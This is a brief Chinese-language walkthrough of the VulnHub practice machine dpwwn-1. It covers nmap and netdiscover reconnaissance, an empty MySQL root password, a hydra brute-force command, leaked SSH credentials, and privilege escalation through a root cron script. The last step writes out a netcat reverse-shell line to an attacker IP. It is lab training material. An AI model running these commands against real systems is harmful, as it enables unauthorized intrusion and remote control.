目录
介绍
系列:dpwwn(此系列共3台)
发布日期:2019 年 8 月 4 日
难度:初级
运行环境:VMware Workstation
目标:取得Root权限
学习:
- 数据库空口令
- 计划任务提权
靶机地址:https://www.vulnhub.com/entry/dpwwn-1,342/
信息收集
netdiscover主机发现
sudo netdiscover -i eth0 -r 192.168.229.0/24
主机信息探测
nmap -p- 192.168.229.143
nmap -p 22,80,3306 -A 192.168.229.143
nmap -p 22,80,3306 --script=vuln 192.168.229.143
连接数据库
fscan探测一下,直接发现了数据库空密码
如果想尝试爆破的话,也是可以的
gzip -d /usr/share/wordlists/rockyou.txt.gz
hydra -l root -P ./rockyou.txt 192.168.229.143 mysql -f -e nsr
简单搜寻后,发现疑似SSH账号密码:mistic/testP@$$swordmistic
SSH登录 & 提权
登录系统后,在当前目录下就看到了一个奇怪的sh文件,阅读其内容不由得想到可能涉及到计划任务。
果然发现了计划任务,每隔3分钟root就会执行一次,那就写入反弹shell的命令:
echo "nc -e /bin/bash 192.168.229.128 4455" > logrot.sh